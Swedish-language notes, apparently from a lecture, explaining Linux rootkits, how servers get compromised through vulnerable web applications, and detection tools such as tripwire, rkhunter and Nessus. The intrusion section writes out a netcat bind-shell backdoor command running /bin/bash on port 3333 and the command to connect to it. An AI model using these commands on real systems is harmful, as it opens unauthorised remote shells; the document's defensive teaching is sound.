Rootkits är ett av de större hoten mot en Ubuntu eller Linux-server. Rootkit är en programvara som kanske i sig inte kan betecknas som fientlig, men den kan dölja fientliga program från att synas för systemadministratören eller höja en användares privilegier till systemadministratörens nivå.

Ett rootkit döljer program som exekveras från systemmonitorn eller ps-kommandot, den döljer alla spår av aktiviterer från loggar och de fientliga programmen i filsystemet.

Rootkits är hackarens viktigaste verktyg för att penetrera system, vanligen är syftet med ett rootkit att inkräktaren tänker återkomma till det komprometerade systemet och vill dölja sina förehavanden. Ofta installerar rootkitet en telnet eller ssh-demon på en annan port än de vanligtvis använder och låter dem uppträda som en mindre vanlig men legitim tjänst.

Det finns hjälpmedel som håller reda på ändringar i systemfiler t ex aide, tripwire, systraq, sxid, debsum och bsign (Synaptic).

rkhunter chrootkit (Synaptic)

Hur penetrera maskinen?

En klassiker är webb-applikationer som startar program eller lagrar på servern awstats som under en period hade sårbarheten att kunna sätta katalogen via en variabel i url:en

ladda upp program och skript

Öppna en bakdörr, lyssnar på en port t ex 3333 med kommandot nc -l -p 3333 -e /bin/bash

Leta upp en oandvänd användare, kommandot ./x ger root-lösen, lösenord på en

sk-1.3b

kernel 2.4.18

netcat

SuckIT

nc 192.168.1.1 3333

Vanligen har servern penetrerats via brister i ett webb eller ftp-system. Det räcker inte att hålla efter Apache och PHP på sin server om man har applikationer i denna miljö med sårbarheter och blottor tillräckligt stora för att en angripare han installera främmande programvara på servern. Man kallar denna typ av programvara för rootkit....

Lyssna på onormal nätverkstrafik

Knark, Adore och Rtkit

http://www.rootkit.nl/projects/rootkit_hunter.html

Nessus

Kontrollera dina maskiner

Plugins för kända sårbarheter